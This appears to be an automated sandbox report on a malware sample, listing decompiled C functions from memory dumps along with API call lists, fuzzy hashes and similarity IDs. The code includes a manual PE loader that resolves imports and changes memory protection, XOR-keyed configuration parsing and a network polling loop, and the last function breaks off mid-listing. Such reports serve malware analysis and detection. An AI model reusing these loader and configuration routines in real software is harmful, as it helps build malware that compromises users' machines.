                                                                                                                                  • Opcode Fuzzy Hash: 577a568ac3d33652f4377d3d5eddd80acccd331f21986d2152615192a53e57d0
                                                                                                                                  • Instruction Fuzzy Hash: 82F05466624206BEEB12DAEE9C00EEF76FDEFC5790F110055A508D7144EA70DA01C771
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			_entry_(intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                  				intOrPtr _t4;
                                                                                                                                  				void* _t10;
                                                                                                                                  				void* _t11;
                                                                                                                                  				void* _t12;
                                                                                                                                  				void* _t14;
                                                                                                                                  
                                                                                                                                  				_t14 = 1;
                                                                                                                                  				_t4 = _a8;
                                                                                                                                  				if(_t4 == 0) {
                                                                                                                                  					if(InterlockedDecrement(0x22bd23c) == 0) {
                                                                                                                                  						E022B4DB1();
                                                                                                                                  					}
                                                                                                                                  				} else {
                                                                                                                                  					if(_t4 == 1 && InterlockedIncrement(0x22bd23c) == 1) {
                                                                                                                                  						_t10 = E022B2789(_t11, _t12, _a4); // executed
                                                                                                                                  						if(_t10 != 0) {
                                                                                                                                  							_t14 = 0;
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  				return _t14;
                                                                                                                                  			}









                                                                                                                                  APIs
                                                                                                                                  • InterlockedIncrement.KERNEL32(022BD23C), ref: 022B7F12
                                                                                                                                    • Part of subcall function 022B2789: HeapCreate.KERNEL32(00000000,00400000,00000000,?,00000001,?,?,?,022B7F25,?), ref: 022B279C
                                                                                                                                  • InterlockedDecrement.KERNEL32(022BD23C), ref: 022B7F32
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Interlocked$CreateDecrementHeapIncrement
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3834848776-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E022B933A(signed int* __ecx, intOrPtr _a4, signed int* _a8, signed int* _a12) {
                                                                                                                                  				intOrPtr _v12;
                                                                                                                                  				signed int _v20;
                                                                                                                                  				intOrPtr _v24;
                                                                                                                                  				signed int _v60;
                                                                                                                                  				char _v68;
                                                                                                                                  				void* __ebx;
                                                                                                                                  				void* __edi;
                                                                                                                                  				void* __esi;
                                                                                                                                  				intOrPtr _t14;
                                                                                                                                  				signed int* _t16;
                                                                                                                                  				signed int _t25;
                                                                                                                                  				signed int _t26;
                                                                                                                                  				signed int* _t28;
                                                                                                                                  				signed int _t30;
                                                                                                                                  
                                                                                                                                  				_t28 = __ecx;
                                                                                                                                  				_t14 =  *0x22bd2c8; // 0x4779618
                                                                                                                                  				_v12 = _t14;
                                                                                                                                  				_t16 = _a12;
                                                                                                                                  				_t30 = 8;
                                                                                                                                  				if(_t16 != 0) {
                                                                                                                                  					 *_t16 =  *_t16 & 0x00000000;
                                                                                                                                  				}
                                                                                                                                  				do {
                                                                                                                                  					_t31 =  &_v68;
                                                                                                                                  					if(E022B8C01( &_v68) == 0) {
                                                                                                                                  						goto L16;
                                                                                                                                  					}
                                                                                                                                  					_t30 = E022B97F7(_t31, _a4, _v12);
                                                                                                                                  					if(_t30 == 0) {
                                                                                                                                  						_t25 = E022B5988(_t31, _t28); // executed
                                                                                                                                  						_t30 = _t25;
                                                                                                                                  						if(_t30 != 0) {
                                                                                                                                  							if(_t30 == 0x102) {
                                                                                                                                  								E022BD000 = E022BD000 + 0xea60;
                                                                                                                                  							}
                                                                                                                                  						} else {
                                                                                                                                  							if(_v24 != 0xc8) {
                                                                                                                                  								_t30 = 0xe8;
                                                                                                                                  							} else {
                                                                                                                                  								_t26 = _v20;
                                                                                                                                  								if(_t26 == 0) {
                                                                                                                                  									_t30 = 0x10d2;
                                                                                                                                  								} else {
                                                                                                                                  									_t28 = _a8;
                                                                                                                                  									if(_t28 != 0) {
                                                                                                                                  										_v60 = _v60 & _t30;
                                                                                                                                  										 *_t28 = _v60;
                                                                                                                                  										_t28 = _a12;
                                                                                                                                  										if(_t28 != 0) {
                                                                                                                                  											 *_t28 = _t26;
                                                                                                                                  										}
                                                                                                                                  									}
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					E022B58DB( &_v68, 0x102, _t28, _t30);
                                                                                                                                  					L16:
                                                                                                                                  				} while (_t30 == 0x2f19 && WaitForSingleObject( *0x22bd26c, 0) == 0x102);
                                                                                                                                  				return _t30;
                                                                                                                                  			}


















                                                                                                                                  APIs
                                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,00000000,00000000,74E481D0), ref: 022B93EC
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ObjectSingleWait
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 24740636-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 34%
                                                                                                                                  			E022B1037(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                                                                                                                  				intOrPtr _v12;
                                                                                                                                  				void* _v18;
                                                                                                                                  				char _v20;
                                                                                                                                  				intOrPtr _t15;
                                                                                                                                  				void* _t17;
                                                                                                                                  				intOrPtr _t19;
                                                                                                                                  				void* _t23;
                                                                                                                                  
                                                                                                                                  				_v20 = 0;
                                                                                                                                  				asm("stosd");
                                                                                                                                  				asm("stosd");
                                                                                                                                  				asm("stosd");
                                                                                                                                  				asm("stosw");
                                                                                                                                  				_t15 =  *0x22bd2a8; // 0x24ba5a8
                                                                                                                                  				_t4 = _t15 + 0x22be39c; // 0x4778944
                                                                                                                                  				_t20 = _t4;
                                                                                                                                  				_t6 = _t15 + 0x22be124; // 0x650047
                                                                                                                                  				_t17 = E022B76E7(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
                                                                                                                                  				if(_t17 < 0) {
                                                                                                                                  					_t23 = _t17;
                                                                                                                                  				} else {
                                                                                                                                  					_t23 = 8;
                                                                                                                                  					if(_v20 != _t23) {
                                                                                                                                  						_t23 = 1;
                                                                                                                                  					} else {
                                                                                                                                  						_t19 = E022B7EA4(_t20, _v12);
                                                                                                                                  						if(_t19 != 0) {
                                                                                                                                  							 *_a16 = _t19;
                                                                                                                                  							_t23 = 0;
                                                                                                                                  						}
                                                                                                                                  						__imp__#6(_v12);
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  				return _t23;
                                                                                                                                  			}











                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 022B76E7: SysFreeString.OLEAUT32(?), ref: 022B77C6
                                                                                                                                    • Part of subcall function 022B7EA4: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,022B51D4,004F0053,00000000,?), ref: 022B7EAD
                                                                                                                                    • Part of subcall function 022B7EA4: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,022B51D4,004F0053,00000000,?), ref: 022B7ED7
                                                                                                                                    • Part of subcall function 022B7EA4: memset.NTDLL ref: 022B7EEB
                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 022B109A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FreeString$lstrlenmemcpymemset
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 397948122-0
                                                                                                                                  • Opcode ID: 2ba86bf286c087930807e4094593de5521809164be78cb9d34b0e783b9cbb15e
                                                                                                                                  • Instruction ID: 65cd3aa1a6a1f070ef346da0c190892a0c15dd006ef3a072656c5c48647be7bb
                                                                                                                                  • Opcode Fuzzy Hash: 2ba86bf286c087930807e4094593de5521809164be78cb9d34b0e783b9cbb15e
                                                                                                                                  • Instruction Fuzzy Hash: E2015A32920159BFDB139BE9DC04DEABBB9EF44390F414825EE15A6064E7719921CB90
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • Module32First.KERNEL32(00000000,00000224), ref: 0235CA61
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.559143030.0000000002359000.00000040.00000001.sdmp, Offset: 02359000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FirstModule32
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3757679902-0
                                                                                                                                  • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                  • Instruction ID: bf10d1e3067a98add651d0d927ec71963355b9009eff148d15e2080a8a5345d7
                                                                                                                                  • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                  • Instruction Fuzzy Hash: 2AF0F6315003206BD7207BF49C8CF6E7AECAF48628F14292AFA4A910C0CB70E8458AA0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558355607.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _memset
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2102423945-0
                                                                                                                                  • Opcode ID: 141070658d78ade838dcfdee5f25a4b0fae43cdc9ca8b4750ae202ba536ad394
                                                                                                                                  • Instruction ID: ed52568bc59515ee859463f4e18c9ef311edcb66e0091e068fec364a2c5981ef
                                                                                                                                  • Opcode Fuzzy Hash: 141070658d78ade838dcfdee5f25a4b0fae43cdc9ca8b4750ae202ba536ad394
                                                                                                                                  • Instruction Fuzzy Hash: 050128B5600108FBCB04DFA9D995E9E73B5AF88350F14C549F9198B280D738EE50CB94
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • VirtualProtect.KERNEL32(01FB4154,01FB4264,00000040,?,?,0042F5E3), ref: 0042E4D1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558355607.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ProtectVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 544645111-0
                                                                                                                                  • Opcode ID: b75599429c841d951495a9b5ef61d44d11d171bbdf7ddafb936f8452b594c68f
                                                                                                                                  • Instruction ID: 7254842ad740c22b289b27de2db53db516d3118084c442a71ade2219d008d17e
                                                                                                                                  • Opcode Fuzzy Hash: b75599429c841d951495a9b5ef61d44d11d171bbdf7ddafb936f8452b594c68f
                                                                                                                                  • Instruction Fuzzy Hash: 620116B1208284EED301CF64BE86B523BA4AF95707F20712DE0465B2B5DB756604DB2E
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 37%
                                                                                                                                  			E0040136F(void* __eax, intOrPtr _a4) {
                                                                                                                                  
                                                                                                                                  				 *0x403110 =  *0x403110 & 0x00000000;
                                                                                                                                  				_push(0);
                                                                                                                                  				_push(0x40310c);
                                                                                                                                  				_push(1);
                                                                                                                                  				_push(_a4);
                                                                                                                                  				 *0x403108 = 0xc; // executed
                                                                                                                                  				L00401746(); // executed
                                                                                                                                  				return __eax;
                                                                                                                                  			}




                                                                                                                                  APIs
                                                                                                                                  • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(004013F1,00000001,0040310C,00000000), ref: 0040138D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558314873.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.558324850.0000000000404000.00000040.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.558336689.0000000000406000.00000040.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DescriptorSecurity$ConvertString
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3907675253-0
                                                                                                                                  • Opcode ID: 1a6a7a0cbcb211806d4e421c93ccdd2d337a60f7500ba4ce8895fb39eafca520
                                                                                                                                  • Instruction ID: 17493d3f587428f8fefc298e6e1fa5166c11f7a8d69dd9124bb4eb41bc27f639
                                                                                                                                  • Opcode Fuzzy Hash: 1a6a7a0cbcb211806d4e421c93ccdd2d337a60f7500ba4ce8895fb39eafca520
                                                                                                                                  • Instruction Fuzzy Hash: 53C04C74144310A7E6109F009D46F457E557759706F204529B1103D1E183F95254895D
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • RtlEncodePointer.NTDLL(00000000,?,0041861B,?,?,0041B940), ref: 0041B7D7
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558355607.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: EncodePointer
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2118026453-0
                                                                                                                                  • Opcode ID: 48f32bdd431aa7b82a37eddd464709490d3fdfde6bb30ac7076121da41895a52
                                                                                                                                  • Instruction ID: 248be66754e1a3ed536d27b3ac3727851aa8c7f713864bd334da7b17a2ec1c9f
                                                                                                                                  • Opcode Fuzzy Hash: 48f32bdd431aa7b82a37eddd464709490d3fdfde6bb30ac7076121da41895a52
                                                                                                                                  • Instruction Fuzzy Hash: A9A0243104430C73D30013C37C0DF113F0CD3C0771F040010F50C01C500D7154104055
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 86%
                                                                                                                                  			E00401D7E(void* __eax) {
                                                                                                                                  				char _v8;
                                                                                                                                  				void* _v12;
                                                                                                                                  				void* __edi;
                                                                                                                                  				void* _t18;
                                                                                                                                  				long _t24;
                                                                                                                                  				long _t26;
                                                                                                                                  				long _t29;
                                                                                                                                  				intOrPtr _t40;
                                                                                                                                  				void* _t41;
                                                                                                                                  				intOrPtr* _t42;
                                                                                                                                  				void* _t44;
                                                                                                                                  
                                                                                                                                  				_t41 = __eax;
                                                                                                                                  				_t16 =  *0x403100;
                                                                                                                                  				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x403100 - 0x69b24f45 &  !( *0x403100 - 0x69b24f45);
                                                                                                                                  				_t18 = E00401000( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x403100 - 0x69b24f45 &  !( *0x403100 - 0x69b24f45),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x403100 - 0x69b24f45 &  !( *0x403100 - 0x69b24f45), _t16 + 0x964da0fc,  &_v8,  &_v12); // executed
                                                                                                                                  				if(_t18 != 0) {
                                                                                                                                  					_t29 = 8;
                                                                                                                                  					goto L8;
                                                                                                                                  				} else {
                                                                                                                                  					_t40 = _v8;
                                                                                                                                  					_t29 = E004010E4(_t33, _t40, _t41);
                                                                                                                                  					if(_t29 == 0) {
                                                                                                                                  						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
                                                                                                                                  						_t24 = E00401264(_t40, _t44); // executed
                                                                                                                                  						_t29 = _t24;
                                                                                                                                  						if(_t29 == 0) {
                                                                                                                                  							_t26 = E00401BAE(_t44, _t40); // executed
                                                                                                                                  							_t29 = _t26;
                                                                                                                                  							if(_t29 == 0) {
                                                                                                                                  								_push(_t26);
                                                                                                                                  								_push(1);
                                                                                                                                  								_push(_t40);
                                                                                                                                  								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
                                                                                                                                  									_t29 = GetLastError();
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					_t42 = _v12;
                                                                                                                                  					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
                                                                                                                                  					E004017CB(_t42);
                                                                                                                                  					L8:
                                                                                                                                  					return _t29;
                                                                                                                                  				}
                                                                                                                                  			}















                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00401000: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,00401DBA,?,?,?,?,?,00000002,?,?), ref: 00401024
                                                                                                                                    • Part of subcall function 00401000: GetProcAddress.KERNEL32(00000000,?), ref: 00401046
                                                                                                                                    • Part of subcall function 00401000: GetProcAddress.KERNEL32(00000000,?), ref: 0040105C
                                                                                                                                    • Part of subcall function 00401000: GetProcAddress.KERNEL32(00000000,?), ref: 00401072
                                                                                                                                    • Part of subcall function 00401000: GetProcAddress.KERNEL32(00000000,?), ref: 00401088
                                                                                                                                    • Part of subcall function 00401000: GetProcAddress.KERNEL32(00000000,?), ref: 0040109E
                                                                                                                                    • Part of subcall function 004010E4: memcpy.NTDLL(00000002,?,00401DC8,?,?,?,?,?,00401DC8,?,?,?,?,?,?,?), ref: 0040111B
                                                                                                                                    • Part of subcall function 004010E4: memcpy.NTDLL(00000002,?,?,?,00000002), ref: 00401150
                                                                                                                                    • Part of subcall function 00401264: LoadLibraryA.KERNEL32(?,?,00000000,?,?), ref: 0040129C
                                                                                                                                    • Part of subcall function 00401BAE: VirtualProtect.KERNEL32(00000000,?,?,?,?,?,00000000,?,?), ref: 00401BE7
                                                                                                                                    • Part of subcall function 00401BAE: VirtualProtect.KERNEL32(00000000,?,?,?), ref: 00401C5C
                                                                                                                                    • Part of subcall function 00401BAE: GetLastError.KERNEL32 ref: 00401C62
                                                                                                                                  • GetLastError.KERNEL32(?,?), ref: 00401DFC
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558314873.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.558324850.0000000000404000.00000040.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.558336689.0000000000406000.00000040.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressProc$ErrorLastProtectVirtualmemcpy$HandleLibraryLoadModule
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2673762927-0
                                                                                                                                  • Opcode ID: 8731538ceb2d12050e79bcb7b22b00ca6da66f24cf0d43321f952fe27491e5f4
                                                                                                                                  • Instruction ID: e7e1ad0c5ae7c8012b4b43df85cfbbfbb8c05be311c934117461263c8cc71cd7
                                                                                                                                  • Opcode Fuzzy Hash: 8731538ceb2d12050e79bcb7b22b00ca6da66f24cf0d43321f952fe27491e5f4
                                                                                                                                  • Instruction Fuzzy Hash: E811E936600301ABD721AA95CD80DEF77BCAF88318700017EFB01B7691EAB4ED0587D4
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 0235C729
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.559143030.0000000002359000.00000040.00000001.sdmp, Offset: 02359000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                  • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                  • Instruction ID: 3238be562b0a840527b94654aebfe27baabe7a29b99442e49b9d705d877f2f77
                                                                                                                                  • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                  • Instruction Fuzzy Hash: AC113C79A00208EFDB01DF98CA85E98BFF5AF08750F058095F9489B362D771EA90DF84
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GlobalAlloc.KERNEL32(00000000,01FB4264,0042F52D), ref: 0042E418
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558355607.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocGlobal
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3761449716-0
                                                                                                                                  • Opcode ID: c866dd67d46a662cb26efd7e2e2d1f1bf081687ca6cd9af6b3686c8412a9d681
                                                                                                                                  • Instruction ID: 02ff169c2bcaba9242ef57989b002877965e4d2950505e3d7326f7fc0d8de085
                                                                                                                                  • Opcode Fuzzy Hash: c866dd67d46a662cb26efd7e2e2d1f1bf081687ca6cd9af6b3686c8412a9d681
                                                                                                                                  • Instruction Fuzzy Hash: CBB012B06063149FD7108F50EFC9B103764E348302F000010F652D526DC73004009B14
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Non-executed Functions

                                                                                                                                  C-Code - Quality: 96%
                                                                                                                                  			E022B7FBE(int* __ecx) {
                                                                                                                                  				int _v8;
                                                                                                                                  				void* _v12;
                                                                                                                                  				void* _v16;
                                                                                                                                  				void* __esi;
                                                                                                                                  				signed int _t28;
                                                                                                                                  				signed int _t33;
                                                                                                                                  				signed int _t39;
                                                                                                                                  				char* _t45;
                                                                                                                                  				char* _t46;
                                                                                                                                  				char* _t47;
                                                                                                                                  				char* _t48;
                                                                                                                                  				char* _t49;
                                                                                                                                  				char* _t50;
                                                                                                                                  				void* _t51;
                                                                                                                                  				void* _t52;
                                                                                                                                  				void* _t53;
                                                                                                                                  				intOrPtr _t54;
                                                                                                                                  				void* _t56;
                                                                                                                                  				intOrPtr _t57;
                                                                                                                                  				intOrPtr _t58;
                                                                                                                                  				signed int _t61;
                                                                                                                                  				intOrPtr _t64;
                                                                                                                                  				signed int _t65;
                                                                                                                                  				signed int _t70;
                                                                                                                                  				void* _t72;
                                                                                                                                  				void* _t73;
                                                                                                                                  				signed int _t75;
                                                                                                                                  				signed int _t78;
                                                                                                                                  				signed int _t82;
                                                                                                                                  				signed int _t86;
                                                                                                                                  				signed int _t90;
                                                                                                                                  				signed int _t94;
                                                                                                                                  				signed int _t98;
                                                                                                                                  				void* _t103;
                                                                                                                                  				intOrPtr _t121;
                                                                                                                                  
                                                                                                                                  				_t104 = __ecx;
                                                                                                                                  				_t28 =  *0x22bd2a4; // 0x69b25f44
                                                                                                                                  				if(E022B6247( &_v8,  &_v12, _t28 ^ 0x889a0120) != 0 && _v12 >= 0x90) {
                                                                                                                                  					 *0x22bd2d8 = _v8;
                                                                                                                                  				}
                                                                                                                                  				_t33 =  *0x22bd2a4; // 0x69b25f44
                                                                                                                                  				if(E022B6247( &_v16,  &_v12, _t33 ^ 0x0159e6c7) == 0) {
                                                                                                                                  					_v12 = 2;
                                                                                                                                  					L69:
                                                                                                                                  					return _v12;
                                                                                                                                  				}
                                                                                                                                  				_t39 =  *0x22bd2a4; // 0x69b25f44
                                                                                                                                  				if(E022B6247( &_v12,  &_v8, _t39 ^ 0xe60382a5) == 0) {
                                                                                                                                  					L67:
                                                                                                                                  					HeapFree( *0x22bd238, 0, _v16);
                                                                                                                                  					goto L69;
                                                                                                                                  				} else {
                                                                                                                                  					_t103 = _v12;
                                                                                                                                  					if(_t103 == 0) {
                                                                                                                                  						_t45 = 0;
                                                                                                                                  					} else {
                                                                                                                                  						_t98 =  *0x22bd2a4; // 0x69b25f44
                                                                                                                                  						_t45 = E022B9403(_t104, _t103, _t98 ^ 0x7895433b);
                                                                                                                                  					}
                                                                                                                                  					if(_t45 != 0) {
                                                                                                                                  						_t104 =  &_v8;
                                                                                                                                  						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
                                                                                                                                  							 *0x22bd240 = _v8;
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					if(_t103 == 0) {
                                                                                                                                  						_t46 = 0;
                                                                                                                                  					} else {
                                                                                                                                  						_t94 =  *0x22bd2a4; // 0x69b25f44
                                                                                                                                  						_t46 = E022B9403(_t104, _t103, _t94 ^ 0x219b08c7);
                                                                                                                                  					}
                                                                                                                                  					if(_t46 != 0) {
                                                                                                                                  						_t104 =  &_v8;
                                                                                                                                  						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
                                                                                                                                  							 *0x22bd244 = _v8;
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					if(_t103 == 0) {
                                                                                                                                  						_t47 = 0;
                                                                                                                                  					} else {
                                                                                                                                  						_t90 =  *0x22bd2a4; // 0x69b25f44
                                                                                                                                  						_t47 = E022B9403(_t104, _t103, _t90 ^ 0x31fc0661);
                                                                                                                                  					}
                                                                                                                                  					if(_t47 != 0) {
                                                                                                                                  						_t104 =  &_v8;
                                                                                                                                  						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
                                                                                                                                  							 *0x22bd248 = _v8;
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					if(_t103 == 0) {
                                                                                                                                  						_t48 = 0;
                                                                                                                                  					} else {
                                                                                                                                  						_t86 =  *0x22bd2a4; // 0x69b25f44
                                                                                                                                  						_t48 = E022B9403(_t104, _t103, _t86 ^ 0x0cd926ce);
                                                                                                                                  					}
                                                                                                                                  					if(_t48 != 0) {
                                                                                                                                  						_t104 =  &_v8;
                                                                                                                                  						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
                                                                                                                                  							 *0x22bd004 = _v8;
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					if(_t103 == 0) {
                                                                                                                                  						_t49 = 0;
                                                                                                                                  					} else {
                                                                                                                                  						_t82 =  *0x22bd2a4; // 0x69b25f44
                                                                                                                                  						_t49 = E022B9403(_t104, _t103, _t82 ^ 0x3cd8b2cb);
                                                                                                                                  					}
                                                                                                                                  					if(_t49 != 0) {
                                                                                                                                  						_t104 =  &_v8;
                                                                                                                                  						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
                                                                                                                                  							 *0x22bd02c = _v8;
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					if(_t103 == 0) {
                                                                                                                                  						_t50 = 0;
                                                                                                                                  					} else {
                                                                                                                                  						_t78 =  *0x22bd2a4; // 0x69b25f44
                                                                                                                                  						_t50 = E022B9403(_t104, _t103, _t78 ^ 0x2878b929);
                                                                                                                                  					}
                                                                                                                                  					if(_t50 == 0) {
                                                                                                                                  						L41:
                                                                                                                                  						 *0x22bd24c = 5;
                                                                                                                                  						goto L42;
                                                                                                                                  					} else {
                                                                                                                                  						_t104 =  &_v8;
                                                                                                                                  						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
                                                                                                                                  							goto L41;
                                                                                                                                  						} else {
                                                                                                                                  							L42:
                                                                                                                                  							if(_t103 == 0) {
                                                                                                                                  								_t51 = 0;
                                                                                                                                  							} else {
                                                                                                                                  								_t75 =  *0x22bd2a4; // 0x69b25f44
                                                                                                                                  								_t51 = E022B9403(_t104, _t103, _t75 ^ 0x261a367a);
                                                                                                                                  							}
                                                                                                                                  							if(_t51 != 0) {
                                                                                                                                  								_push(_t51);
                                                                                                                                  								_t72 = 0x10;
                                                                                                                                  								_t73 = E022BA0FD(_t72);
                                                                                                                                  								if(_t73 != 0) {
                                                                                                                                  									_push(_t73);
                                                                                                                                  									E022B9FF6();
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  							if(_t103 == 0) {
                                                                                                                                  								_t52 = 0;
                                                                                                                                  							} else {
                                                                                                                                  								_t70 =  *0x22bd2a4; // 0x69b25f44
                                                                                                                                  								_t52 = E022B9403(_t104, _t103, _t70 ^ 0xb9d404b2);
                                                                                                                                  							}
                                                                                                                                  							if(_t52 != 0 && E022BA0FD(0, _t52) != 0) {
                                                                                                                                  								_t121 =  *0x22bd32c; // 0x47795b0
                                                                                                                                  								E022B1128(_t121 + 4, _t68);
                                                                                                                                  							}
                                                                                                                                  							if(_t103 == 0) {
                                                                                                                                  								_t53 = 0;
                                                                                                                                  							} else {
                                                                                                                                  								_t65 =  *0x22bd2a4; // 0x69b25f44
